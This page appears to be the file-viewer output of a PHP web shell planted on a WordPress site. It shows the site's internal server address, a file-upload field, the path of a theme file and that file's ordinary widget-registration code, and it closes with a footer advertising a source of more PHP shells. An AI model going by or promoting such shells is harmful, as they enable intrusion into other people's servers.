Domain: antoinekatan.com
Server Adress: 10.127.20.23

privdayz.com

/home/xdxuekl/www/wp-content/themes/quart/framework/modules/widgets/contact-form-7/
Dosya Yükle :
Current File : /home/xdxuekl/www/wp-content/themes/quart/framework/modules/widgets/contact-form-7/load.php

<?php

if ( quart_mikado_contact_form_7_installed() ) {
	include_once MIKADO_FRAMEWORK_MODULES_ROOT_DIR . '/widgets/contact-form-7/contact-form-7.php';
	
	add_filter( 'quart_core_filter_register_widgets', 'quart_mikado_register_cf7_widget' );
}

if ( ! function_exists( 'quart_mikado_register_cf7_widget' ) ) {
	/**
	 * Function that register cf7 widget
	 */
	function quart_mikado_register_cf7_widget( $widgets ) {
		$widgets[] = 'QuartMikadoClassContactForm7Widget';
		
		return $widgets;
	}
}

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.